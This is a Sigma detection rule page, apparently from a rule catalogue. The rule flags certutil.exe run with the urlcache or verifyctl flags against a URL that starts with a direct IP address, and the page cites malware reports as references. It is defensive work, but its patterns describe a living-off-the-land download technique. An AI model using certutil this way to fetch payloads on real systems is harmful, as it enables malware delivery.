Suspicious File Downloaded From Direct IP Via Certutil.EXE

 1title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
 2id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
 3related:
 4    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download
 5      type: similar
 6    - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download
 7      type: similar
 8status: test
 9description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
10references:
11    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
12    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
13    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
14    - https://twitter.com/egre55/status/1087685529016193025
15    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
16    - https://twitter.com/_JohnHammond/status/1708910264261980634
17author: Nasreddine Bencherchali (Nextron Systems)
18date: 2023-02-15
19tags:
20    - attack.defense-evasion
21    - attack.t1027
22logsource:
23    category: process_creation
24    product: windows
25detection:
26    selection_img:
27        - Image|endswith: '\certutil.exe'
28        - OriginalFileName: 'CertUtil.exe'
29    selection_flags:
30        CommandLine|contains:
31            - 'urlcache '
32            - 'verifyctl '
33    selection_http:
34        CommandLine|contains:
35            - '://1'
36            - '://2'
37            - '://3'
38            - '://4'
39            - '://5'
40            - '://6'
41            - '://7'
42            - '://8'
43            - '://9'
44    # filter_local_ips:
45    #     # Note: Uncomment this filter if you want to exclude local IPs
46    #     CommandLine|contains:
47    #         - '://10.' # 10.0.0.0/8
48    #         - '://192.168.' # 192.168.0.0/16
49    #         - '://172.16.' # 172.16.0.0/12
50    #         - '://172.17.'
51    #         - '://172.18.'
52    #         - '://172.19.'
53    #         - '://172.20.'
54    #         - '://172.21.'
55    #         - '://172.22.'
56    #         - '://172.23.'
57    #         - '://172.24.'
58    #         - '://172.25.'
59    #         - '://172.26.'
60    #         - '://172.27.'
61    #         - '://172.28.'
62    #         - '://172.29.'
63    #         - '://172.30.'
64    #         - '://172.31.'
65    #         - '://127.' # 127.0.0.0/8
66    #         - '://169.254.' # 169.254.0.0/16
67    filter_main_seven_zip:
68        CommandLine|contains: '://7-' # For https://7-zip.org/
69    condition: all of selection_* and not 1 of filter_main_*
70falsepositives:
71    - Unknown
72level: high

References

• certutil

  

  Learn about certutil, a command-line program that displays CA configuration information, configures Certificate Services, and backs up and restores CA components.

  
  Read More

• An AgentTesla Sample Using VBA Macros and Certutil

  AgentTesla is a .NET stealer that adversaries commonly buy and combine with other malicious products for deployment. In this post I’m tearing into a XLSM document that downloads and executes further AgentTesla malware. If you want to follow along at home, the sample is available in MalwareBazaar here: https://bazaar.abuse.ch/sample/d1c616976e917d54778f587a2550ee5568a72b661d5f04e68d194ce998864d84/.

  
  Read More

• Compromised Exchange server hosting cryptojacker targeting other Exchange servers

  

  An ouroboros of malicious cryptominers takes advantage of the ProxyLogon exploit

  
  Read More

• x.com

  
  Read More

• Certutil on LOLBAS

  

  Certutil.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.

  
  Read More

• x.com

  
  Read More

Related rules

• Base64 Encoded PowerShell Command Detected
• Certificate Exported Via Certutil.EXE
• ConvertTo-SecureString Cmdlet Usage Via CommandLine
• Decode Base64 Encoded Text
• Decode Base64 Encoded Text -MacOs